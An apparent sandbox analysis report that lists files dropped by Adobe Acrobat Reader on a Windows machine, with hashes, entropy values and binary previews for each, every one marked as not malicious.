                                            SHA1:AF8F2984A75F85007BECD8518B0127060CF1AA4B
                                            SHA-256:5E71A9CAFE9F33D7EF3B5A37667986637BCFA8A13D5C3815395659DF05345D33
                                            SHA-512:4967A6F4C09011A7F14CA5085FA556EBD9E629114C2DB3B28C35A2595966B14ECA3F6956E4343BC9842F47D9BE6E8191BB906A64B0F4C471CBBE2BA3847224C1
                                            Malicious:false
                                            Preview:.... .c.....<..]........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:Certificate, Version=3
                                            Category:dropped
                                            Size (bytes):1391
                                            Entropy (8bit):7.705940075877404
                                            Encrypted:false
                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                            Malicious:false
                                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                            Category:dropped
                                            Size (bytes):71954
                                            Entropy (8bit):7.996617769952133
                                            Encrypted:true
                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                            Malicious:false
                                            Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):192
                                            Entropy (8bit):2.7485180290352824
                                            Encrypted:false
                                            SSDEEP:3:kkFklD5VhfllXlE/HT8kD7llXNNX8RolJuRdxLlGB9lQRYwpDdt:kKk6T86ldNMa8RdWBwRd
                                            MD5:6ADD0ABF0640508670C48AC3EACFD113
                                            SHA1:4D037AC9C41C495A515D7564AA9B8BB9088C7C41
                                            SHA-256:24146BCD816EFF0A546D3EC9CCE992569644F0363BB3B13E8575C1064D6EBCE8
                                            SHA-512:A81CC123073E2DCF07B1714360847C98E80FAC0BCECA8D682B25F8DD632D756D92E36E8564D79220C5456BB29099FF1B268FB5D4FB8D1A41B826358E7F6CDC0B
                                            Malicious:false
                                            Preview:p...... ...........w6..(....................................................... ..........W....}...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):328
                                            Entropy (8bit):3.244101792565376
                                            Encrypted:false
                                            SSDEEP:6:kKp5F9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:bsDImsLNkPlE99SNxAhUe/3
                                            MD5:618A1CBA4852C992A4908D21A401A998
                                            SHA1:57BB3FCF4B692BDC7499BF88A8B3468D884CF306
                                            SHA-256:86EA27DC69BCA66D2C2B8625A3625CF44E32103AD2B0852701D35EB32A66048F
                                            SHA-512:6756B44075C26CBC0C9E03555489DDA6B42B47FA33A25EAC9D58B5517E09D88285E34DA21E6BA513C035DBDB09857D76CF049374479D91A5700DEAB4995B4C4E
                                            Malicious:false
                                            Preview:p...... ..........{.w6..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):247234
                                            Entropy (8bit):3.3245480448633247
                                            Encrypted:false
                                            SSDEEP:1536:mKPCPiyzDtrh1cK3XEivK7VK/3AYvYwgqUrRo+RQn:TPClJ/3AYvYwglFo+RQn
                                            MD5:F7B75939ED43CD13BC5FA5A7E72C9C16
                                            SHA1:2FB9185CFEB8001598A301C83ECA9948420007ED
                                            SHA-256:2D50A4E5C21D7154373C0DF9DAF523FF54E48551510828BDD08D0E3B24125055
                                            SHA-512:E7AB73FFC3402C06D67410C52140A801A7FCBA9B8D248F6C6A069A31FB14437B347BB2973DE361B395E49E50A0A11E515F3E9EC1A73B568421B64E059B883758
                                            Malicious:false
                                            Preview:Adobe Acrobat Reader (64-bit) 23.6.20320....?A12_AV2_Search_18px.............................................................................................................KKK KKK.KKK.KKK.KKK.KKK.KKK@........................................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.............................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.........................KKK.KKK.KKK.KKK0....................KKK.KKK.KKK.KKK`....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK.KKK.....................................KKK.KKK.....................KKK.KKK.KKK0................................KKK.KKK.....................KKK`KKK.KKK.............................KKK@KKK.KKK.....................KKK.KKK.KKK.KKK@....................KKK.KKK.KKK.KKK`........................KKKPKKK.KKK.KKK.KKK.........KKKPKKK.KKK.KKK.KKK.............................KKK`KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK.KKK

                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):4
                                            Entropy (8bit):0.8112781244591328
                                            Encrypted:false
                                            SSDEEP:3:e:e
                                            MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                            SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                            SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                            SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                            Malicious:false
                                            Preview:....

                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):2145
                                            Entropy (8bit):5.067471156048809
                                            Encrypted:false
                                            SSDEEP:48:YY2sL0/EY0bMSlMtCM5mMOpiMAW0MretMSMmkaMY:uv/SYtt55V6AWLre6JmkhY
                                            MD5:52BD1ED0D7D167085D2380579118D9D2
                                            SHA1:A11FAB7413922FF0EB3026152F439CDFA4CDA23F
                                            SHA-256:EF1A73B80C769F48E40AF91721E3DEEFD78BC53589F7AAD5B6687FB8C7E40C10
                                            SHA-512:58481A8A06CD4DCA06403F00154F37896666E6EE8ED16DCA6706F7303DD6D07D7D27F74C35381BFD59754CF599370FFDB178F52118B623DB7A9602090521042E
                                            Malicious:false
                                            Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1731576491000},{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"23c88c8acf166d9fda5ae4d83df3db72","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696420889000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"d5fa85f4cf271b5fa75367efd1b392fa","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1696420884000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"7c2ad79e375e3ea39f82a389e8a5841f","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1696420882000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"c3af48ba3dee086edbbf20dff46c7ee0","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1255,"ts":1696333862000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"7101e009d8bf8920d0a3dd3f5dc75ebc","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1250,"ts":1696333862000},{"id":"DC_Reader_Edit_LHP_Banner"

                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
                                            Category:dropped
                                            Size (bytes):12288
                                            Entropy (8bit):1.1879580958031168
                                            Encrypted:false
                                            SSDEEP:48:TGufl2GL7msEHUUUUUUUUMOSvR9H9vxFGiDIAEkGVvpwI:lNVmswUUUUUUUUh+FGSItF
                                            MD5:A5A13D8B2C2A2913D632B64A5680A01D
                                            SHA1:F7D16565CE316FC4F8DCEA6B145E3EE4B8C25519
                                            SHA-256:1B4C65043B6101D5B2299DF40806B9DAD904B3701CBCE58C32FDF877465A857D
                                            SHA-512:F0ABAF4454F75E89D499C17A81EC7EC743F5D549FA2AF198163EDCD51090A7AE060CEBC8AF6A322AEBAB80AB46E9B4C07C35F443BA436970D3CFFD906EB65CEF
                                            Malicious:false
                                            Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:SQLite Rollback Journal
                                            Category:dropped
                                            Size (bytes):8720
                                            Entropy (8bit):1.6029142780577297
                                            Encrypted:false
                                            SSDEEP:48:7MXKUUUUUUUUUUMcvR9H9vxFGiDIAEkGVvDYqFl2GL7msr:7VUUUUUUUUUUNFGSIt2KVmsr
                                            MD5:F2CB068F33F08FADA49E3AAF0769E268
                                            SHA1:D73DCB91F93890273B73D1146D95BBBE02480059
                                            SHA-256:3F45EB3D0EA20C7F86E7FE4BA793CDBE1E632A8DAA26AF04C5195300C1DCD9A2
                                            SHA-512:9615E516621223F4C419F312037E0BE01BDF9A1183EC9915C80B5D8975E9B024061C00F20EA504C70220BE842555E2E74A845FA86090615B853D8DEA8AE7A39F
                                            Malicious:false
                                            Preview:.... .c....."3b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache64.bin

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):66726
                                            Entropy (8bit):5.392739213842091
                                            Encrypted:false
                                            SSDEEP:768:RNOpblrU6TBH44ADKZEgcfjwrNYD+9EGwSsd0Cts1I5lEYyu:6a6TZ44ADEcLwrNYq97CuK
                                            MD5:02C10E56BA966DE5DBB89F2794240ADD
                                            SHA1:37C50F17AD58A713A2DA4F7F8EB41F8B84755E49
                                            SHA-256:B4CDBCC5E299D7009F1244D7132F514BE50E79A959AEB4EB88813D88C22FCE9F
                                            SHA-512:1EEB68C1E368E6360123C08D720B3479F8CB07AE4E774BBE79F939775119EB147F373D9FE7C22061D31A798E14CB91B64204DA7E6C4C3578CC5B4FA839A3DBB4
                                            Malicious:false
                                            Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2

                                            C:\Users\user\AppData\Local\Temp\MSI9d717.LOG

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):246
                                            Entropy (8bit):3.5085442896850614
                                            Encrypted:false
                                            SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K84WBlxYle:Qw946cPbiOxDlbYnuRKhw
                                            MD5:28A5068381F4AAAD98506021F1F7AAA4
                                            SHA1:4FD133C11B7B86050E71CBA2B7D32B6BFC5EFEE2
                                            SHA-256:EFA79EA5ED8BAD9D0DBE8B35C47A5B98AF5F7E83BED2C450476A38959753B4E9
                                            SHA-512:50F77C4DB9A648C6BAA37B0290FBA4F1C72233E7ED237A067489A98117265BF6D8907FEFD4BAA69CCBC087F2658F08E5528E26454C23B4EB505C2E10E204F993
                                            Malicious:false
                                            Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.4./.1.1./.2.0.2.4. . .0.4.:.2.8.:.1.6. .=.=.=.....

                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91dgt1pu_1qpfira_5pw.tmp

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                            Category:dropped
                                            Size (bytes):144514
                                            Entropy (8bit):7.992637131260696
                                            Encrypted:true
                                            SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                            MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                            SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                            SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                            SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                            Malicious:false
                                            Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9yh1lpy_1qpfirb_5pw.tmp

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                            Category:dropped
                                            Size (bytes):144514
                                            Entropy (8bit):7.992637131260696
                                            Encrypted:true
                                            SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                            MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                            SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                            SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                            SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                            Malicious:false
                                            Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-11-14 04-28-10-465.log

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with very long lines (393)
                                            Category:dropped
                                            Size (bytes):16525
                                            Entropy (8bit):5.345946398610936
                                            Encrypted:false
                                            SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                            MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                            SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                            SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                            SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                            Malicious:false
                                            Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):15114
                                            Entropy (8bit):5.346523847564553
                                            Encrypted:false
                                            SSDEEP:384:ng+gogrgwg6gxzW5kABki/J3faNzvOisd3BAkOqV3lLHVTWuuh3CW9Piuz3eGf+I:1ii
                                            MD5:83176765DB7DD6EC24400E010365FD26
                                            SHA1:7EA56C5B0AF03E150F72156B3E21C9DF4083D67D
                                            SHA-256:53C408131A752BF188E10C5E8D430759B10810B87078F20BB014D67CD757157A
                                            SHA-512:A89F959C175077BB824631F21E589D7B2FD891909704AA9E14A8FA0FCF183D2F1CF301D289F0D37AD1F29C9CC1F665C42AC5068A80EF3D368D22CACA90EF0B51
                                            Malicious:false
                                            Preview:SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=7daeb308-a3e9-4071-930a-cb165c20d31d.1731576490485 Timestamp=2024-11-14T04:28:10:485-0500 ThreadID=7496 Component=ngl-lib_NglAppLib Description="SetConf

                                            C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):29752
                                            Entropy (8bit):5.384786635164464
                                            Encrypted:false
                                            SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2rh:N
                                            MD5:AF3297CD40B6C1E19B8FB60E584C8D4F
                                            SHA1:731FBAB663AC82E1757F761EF585F5D931882394
                                            SHA-256:958991C37158E19280928629E7DDB410549483A8CBD6F10FF5702FA33037A0D7
                                            SHA-512:71E3DFFAE893CFE57CD60700B6388B93A4655F62622709B82CD4D97D0C2C1215005A646CEE0F268CA55F3F22E8E0EEE008DF9DD481AAD1D669450A84660649DD
                                            Malicious:false
                                            Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                            C:\Users\user\AppData\Local\Temp\acrocef_low\03ce81d0-06be-4812-8996-d6573d87b3f2.tmp

                                            Download File
                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                            File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                            Category:dropped
                                            Size (bytes):1419751
                                            Entropy (8bit):7.976496077007677
                                            Encrypted:false
                                            SSDEEP:24576:/xA7owWLcGZtwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLcGZtwZGk3mlind9i4ufFXpAXkru
                                            MD5:A46246FAEAB95D87F5B4FE236C2B3D3E
                                            SHA1:7F018DB9238A63FEAD8D11A92297E7366058A75A
                                            SHA-256:7E822FECC47177C5A7F4C250E7D53509D104DE68B0D0CE9445877B508400988E
